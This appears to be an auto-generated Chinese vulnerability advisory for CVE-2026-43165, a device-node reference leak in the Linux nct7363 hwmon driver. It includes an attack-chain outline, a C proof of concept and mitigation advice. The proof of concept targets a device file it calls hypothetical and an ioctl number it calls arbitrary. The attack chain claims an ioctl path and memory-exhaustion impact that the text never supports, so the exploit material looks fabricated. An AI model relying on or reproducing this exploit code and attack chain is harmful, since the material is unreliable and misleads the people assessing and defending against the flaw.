CVE-2026-43165 CVSS 5.5 中危

CVE-2026-43165 Linux内核资源泄漏漏洞

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43165

漏洞类型

资源泄漏

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的hwmon驱动（nct7363）存在一个资源泄漏漏洞。该漏洞发生在`nct7363_present_pwm_fanin`函数中，由于在调用`of_parse_phandle_with_args()`后未正确调用`of_node_put()`来释放设备节点引用，导致资源泄漏。攻击者可利用此漏洞造成本地系统资源耗尽，从而影响系统可用性。该漏洞CVSS评分为5.5，属于中危漏洞。

技术细节

该漏洞源于Linux内核`drivers/hwmon/nct7363.c`驱动程序中的错误代码逻辑。在函数`nct7363_present_pwm_fanin`中，代码使用`of_parse_phandle_with_args()`解析设备树（Device Tree）中的句柄参数以获取设备节点。根据Linux内核设备树API的规范，调用者必须在不再使用该节点时调用`of_node_put()`来递减引用计数。由于该函数缺少这一释放步骤，每次调用都会导致该设备节点的引用计数无法归零，从而造成内存泄漏。攻击者需要本地低权限（PR:L）即可触发该漏洞。通过反复触发受影响的功能或执行特定的系统调用序列，攻击者可以耗尽内核内存资源，导致系统不稳定或拒绝服务（可用性影响：高）。

攻击链分析

STEP 1

侦察

识别目标系统是否使用包含nct7363驱动的Linux内核，并确认内核版本存在漏洞。

STEP 2

获取访问权限

攻击者获取目标系统的本地低权限账户（PR:L）。

STEP 3

触发漏洞

执行特制的程序或脚本，通过系统调用或ioctl接口反复调用`nct7363_present_pwm_fanin`函数。

STEP 4

资源耗尽

由于未释放设备节点引用，随着调用次数增加，内核内存资源逐渐被耗尽。

STEP 5

影响系统

导致系统内存不足，触发OOM Killer或造成系统拒绝服务（DoS）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-43165: Resource Leak in nct7363
 * This code demonstrates the logic leading to the leak.
 * Actual exploitation requires specific hardware and kernel interaction.
 */

#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>

#define DEVICE_PATH "/dev/nct7363" // Hypothetical device node

// Structure to trigger the vulnerable function path
struct fanin_args {
    int fan_id;
};

int main() {
    int fd;
    struct fanin_args args;
    
    fd = open(DEVICE_PATH, O_RDWR);
    if (fd < 0) {
        perror("Failed to open device");
        return 1;
    }

    printf("Starting PoC for CVE-2026-43165...\n");

    // Repeatedly call the ioctl/function that triggers 
    // nct7363_present_pwm_fanin to leak resources
    for (int i = 0; i < 10000; i++) {
        args.fan_id = i;
        // This ioctl would eventually lead to the vulnerable function
        if (ioctl(fd, 0x8001, &args) < 0) { // Arbitrary ioctl number
            perror("Ioctl failed");
            break;
        }
        
        if (i % 1000 == 0) {
            printf("Leaked resources count: %d\n", i);
        }
    }

    close(fd);
    printf("PoC completed. Check kernel memory usage (slab).\n");
    return 0;
}

影响范围

Linux Kernel (修复补丁 4923bbf 之前的版本)

防御指南

临时缓解措施

若无法立即升级，建议通过内核模块禁用nct7363驱动，或者严格限制/dev设备节点的访问控制列表（ACL），仅允许信任的用户或服务访问该驱动接口。同时监控系统内核内存使用情况。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表